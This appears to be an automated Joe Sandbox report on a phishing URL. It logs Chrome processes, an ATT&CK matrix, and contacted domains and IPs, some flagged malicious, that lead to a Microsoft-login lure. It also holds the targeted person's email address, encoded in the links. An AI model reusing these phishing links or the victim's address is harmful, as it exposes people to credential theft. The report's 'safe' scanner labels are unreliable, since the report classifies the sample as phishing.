            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1992,i,4909626885566366861,8010844917547904754,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1992,i,4909626885566366861,8010844917547904754,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise
            Windows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t0%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://banirego.com/?uxkvuxjb&email=$0%Avira URL Cloudsafe
            http://cocteldedeas.mx/rx567/0%Avira URL Cloudsafe
            https://banirego.com/?uxkvuxjb&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t0%Avira URL Cloudsafe
            https://cocteldedeas.mx/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
            https://banirego.com/favicon.ico0%Avira URL Cloudsafe
            https://cocteldedeas.mx/rx5670%Avira URL Cloudsafe
            https://cocteldedeas.mx/rx567/0%Avira URL Cloudsafe
            https://1iugongna.com/favicon.ico0%Avira URL Cloudsafe
            https://1iugongna.com/common/instrumentation/dssostatus0%Avira URL Cloudsafe
            https://1iugongna.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzFpdWdvbmduYS5jb20vIiwiZG9tYWluIjoiMWl1Z29uZ25hLmNvbSIsImtleSI6Im1pekZtN2x2aTRJeCIsInFyYyI6InJlY2liYXNlQHNlYW1hcml0aW1hLmNvbSIsImlhdCI6MTczNjU0MTcxNiwiZXhwIjoxNzM2NTQxODM2fQ.mg8KKqMk_b6jRb_kLR2AKWu0LYmXU6GtW6en6S22WT40%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            1iugongna.com
            207.174.40.182
            truetrue
              unknown
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                banirego.com
                207.174.40.182
                truetrue
                  unknown
                  challenges.cloudflare.com
                  104.18.95.41
                  truefalse
                    high
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      sni1gl.wpc.omegacdn.net
                      152.199.21.175
                      truefalse
                        high
                        www.google.com
                        142.250.185.228
                        truefalse
                          high
                          cocteldedeas.mx
                          188.114.97.3
                          truetrue
                            unknown
                            autologon.microsoftazuread-sso.com
                            20.190.160.20
                            truefalse
                              high
                              portal.microsoftonline.com
                              unknown
                              unknownfalse
                                high
                                identity.nel.measure.office.net
                                unknown
                                unknownfalse
                                  high
                                  aadcdn.msftauth.net
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://cocteldedeas.mx/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/false
                                      high
                                      https://a.nel.cloudflare.com/report/v4?s=VlafJHtsUmyUp7L1Yu7FSOtYQDJZsG3y6b%2BKYn9%2BmAvXbl3d0eoy8UEerLi7lDT4s1%2F%2BJQw9Hdoyl4tCx5CQ%2FfMX4VIzqs51C0063lOkAJCKFGlPgkzneMluKrBUVKPqJ2Q%3Dfalse
                                        high
                                        https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=truetrue
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fff7d524c468c95&lang=autofalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8fff7d524c468c95/1736541706065/35a236f1c8661b11e1fffc2bc8c9301701b2cbbc359ceafaac4bbcb309ba4b49/_ArrUB3Pi9YFLdwfalse
                                              high
                                              http://cocteldedeas.mx/rx567/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://banirego.com/?uxkvuxjb&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                high
                                                https://banirego.com/?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tfalse
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=B%2FYcNZJwfzROsmLaMejRP4nQWP26V75ofSPtiNrNpKr21uiSGzRhf1ymCXUajHfcz0jDdTANkGMcntPEtf8DSKxfdKjGAOqQKHGjIrAtyQrqrYdrRioxHZIwvAG2ZtcEcCg%3Dfalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                      high
                                                      https://cocteldedeas.mx/rx567/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://1iugongna.com/common/instrumentation/dssostatusfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.comfalse
                                                        unknown
                                                        https://cocteldedeas.mx/rx567true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://autologon.microsoftazuread-sso.com/seamaritima.com/winauth/ssoprobe?client-request-id=3907e9e2-ff87-4c26-afac-3d35233ded99&_=1736541723747false
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJfalse
                                                            high
                                                            https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                                              high
                                                              https://1iugongna.com/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzFpdWdvbmduYS5jb20vIiwiZG9tYWluIjoiMWl1Z29uZ25hLmNvbSIsImtleSI6Im1pekZtN2x2aTRJeCIsInFyYyI6InJlY2liYXNlQHNlYW1hcml0aW1hLmNvbSIsImlhdCI6MTczNjU0MTcxNiwiZXhwIjoxNzM2NTQxODM2fQ.mg8KKqMk_b6jRb_kLR2AKWu0LYmXU6GtW6en6S22WT4false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://1iugongna.com/favicon.icofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://banirego.com/favicon.icofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8fff7d524c468c95/1736541706063/t6T-xS85SQCUhhdfalse
                                                                high
                                                                https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tfalse
                                                                  unknown
                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://banirego.com/?uxkvuxjb&email=$chromecache_77.2.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://knockoutjs.com/chromecache_78.2.dr, chromecache_92.2.drfalse
                                                                    high
                                                                    https://login.windows-ppe.netchromecache_76.2.drfalse
                                                                      high
                                                                      https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.jschromecache_78.2.dr, chromecache_92.2.drfalse
                                                                        high
                                                                        http://www.json.org/json2.jschromecache_78.2.dr, chromecache_92.2.drfalse
                                                                          high
                                                                          https://login.microsoftonline.comchromecache_76.2.drfalse
                                                                            high
                                                                            http://www.opensource.org/licenses/mit-license.php)chromecache_78.2.dr, chromecache_92.2.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              142.250.185.228
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              104.18.94.41
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              104.18.95.41
                                                                              challenges.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              188.114.97.3
                                                                              cocteldedeas.mxEuropean Union
                                                                              13335CLOUDFLARENETUStrue
                                                                              188.114.96.3
                                                                              unknownEuropean Union
                                                                              13335CLOUDFLARENETUSfalse
                                                                              207.174.40.182
                                                                              1iugongna.comUnited States
                                                                              6079RCN-ASUStrue
                                                                              35.190.80.1
                                                                              a.nel.cloudflare.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              20.190.160.20
                                                                              autologon.microsoftazuread-sso.comUnited States
                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              IP
                                                                              192.168.2.5
                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1588194
                                                                              Start date and time:2025-01-10 21:40:32 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 3m 42s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:browseurl.jbs
                                                                              Sample URL:https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:7
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal60.phis.win@21/47@28/10
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.186.78, 66.102.1.84, 172.217.16.206, 142.250.185.238, 172.217.18.14, 199.232.214.172, 192.229.221.95, 172.217.16.142, 216.58.212.174, 216.58.206.46, 40.126.31.71, 20.190.159.73, 20.190.159.64, 40.126.31.73, 40.126.31.69, 20.190.159.0, 20.190.159.2, 20.190.159.23, 13.107.6.156, 142.250.186.106, 142.250.185.138, 142.250.186.42, 172.217.18.10, 142.250.184.202, 142.250.74.202, 142.250.186.74, 142.250.186.170, 142.250.181.234, 142.250.185.202, 142.250.186.138, 216.58.212.138, 142.250.185.74, 172.217.23.106, 216.58.206.42, 142.250.185.234, 20.189.173.28, 20.189.173.6, 142.250.181.238, 142.250.186.67, 216.58.212.142, 142.250.185.174, 2.16.168.221, 2.16.168.197, 199.232.210.172, 2.23.242.162, 13.107.246.45, 20.109.210.53, 4.245.163.56
                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, onedscolprdwus18.westus.cloudapp.azure.com, login.live.com, update.googleapis.com, csp.microsoft.com, azurefd-t-prod.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, portal-office365-com.b-0004.b-msedge.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, onedscolprdwus05.westus.cloudapp.azure.com, www.tm.lg.prod.aadmsa
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t
                                                                              No simulations
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:41:31 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2677
                                                                              Entropy (8bit):3.973074656096958
                                                                              Encrypted:false
                                                                              SSDEEP:48:8odQTU4sRHRUZidAKZdA19ehwiZUklqehHy+3:8b/SUrAy
                                                                              MD5:4D7F4169876B0FFEC8459D839C2FB380
                                                                              SHA1:A2EA8CE3DF5D7FB63A88BAAF5960C3A569000DA9
                                                                              SHA-256:137A4AA42A88454C75B4C0333E9006223D27A816686A89A7EECF5F4A22668E90
                                                                              SHA-512:82C6304BC175DE82D980DA457A7966A82B5C91EDAD61D230806B7E0E018D6410C8CAF644D8CA45250FDA27061143A44464496C3552C0DB6C4B3D6ADF1CFEB8F5
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....;...c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z0............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............J.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:41:31 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2679
                                                                              Entropy (8bit):3.9891906293554924
                                                                              Encrypted:false
                                                                              SSDEEP:48:83dQTU4sRHRUZidAKZdA1weh/iZUkAQkqehwy+2:82/SUZ9QFy
                                                                              MD5:3A0DA521CB04B3E3DA30132E84A09094
                                                                              SHA1:CC5A6B3B5236D1A08EA3DD5D63DBB166A20B2F97
                                                                              SHA-256:63CC61BA42BD835ABF1CFFE8CC0B272B99F86778EEB4BB4E9C2E4A0D3173A805
                                                                              SHA-512:0A7264AFB77DE19466947A3347F213CFAB888CA692C82D2B953256AACCEEF0A0CF4A5C88EDFB78923A0467D423DFB056D4942E11D5891033BB6FD1023A6746A5
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.........c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z0............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............J.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2693
                                                                              Entropy (8bit):4.003742563669879
                                                                              Encrypted:false
                                                                              SSDEEP:48:8xhdQTU4sHRUZidAKZdA14tseh7sFiZUkmgqeh7sOy+BX:8xk/iUpnEy
                                                                              MD5:DA240EAF2243E4FD5A7A4DF67A835CB4
                                                                              SHA1:F8ACE523E8E06FCDFD92106DA6F9158C40489912
                                                                              SHA-256:A8AD1A7218BBE75007A4194F513585307AF574DC4B43CFB0F31475F49FF6510A
                                                                              SHA-512:783D140B5286FC42179E8768F241686D2F5F1F34EC57368A4EF2B6B60EC204A67A10FA7CC09A2A7C9073BF1C2DAB72EFFD912583EF14A9EF4C0AF64CC6972534
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............J.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:41:31 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2681
                                                                              Entropy (8bit):3.987226436736703
                                                                              Encrypted:false
                                                                              SSDEEP:48:8SdQTU4sRHRUZidAKZdA1vehDiZUkwqehMy+R:8J/SU62y
                                                                              MD5:88C7236AA471F771DB68B408EF955B00
                                                                              SHA1:E5660431398A2EF1D3BE99536E4F72B2AD38CB43
                                                                              SHA-256:158F5DD80F664FD13DF57BC359F264CE77A418ADD9D1323618860F1D218773C5
                                                                              SHA-512:66151DF5A99DC59017C386A91E9019F90933BBCBAA8430C468D143C1BAE2513437F1EFB84791C98A95A7C2B5896F8E1ECEC2A3AB29A0FC7EECA8AEDEA887453D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....c...c..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I*Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V*Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V*Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V*Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V*Z0............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............J.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 10 19:41:31 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2681
                                                                              Entropy (8bit):3.978581358421151
                                                                              Encrypted:false
                                                                              SSDEEP:48:8jAdQTU4sRHRUZidAKZdA1hehBiZUk1W1qehiy+C:8jz/SU69Cy
                                                                              MD5:E887ABF8AFE74BE841F0EAC468F2F66A
                                                                              SHA1:B748E405636278FC3D3A8D25FCD447D4EAD74BAD
                                                                              SHA-256:08D00CE5B00A3DA9473190247AEF02AC97561E10095F058ECF52191215D3B23E
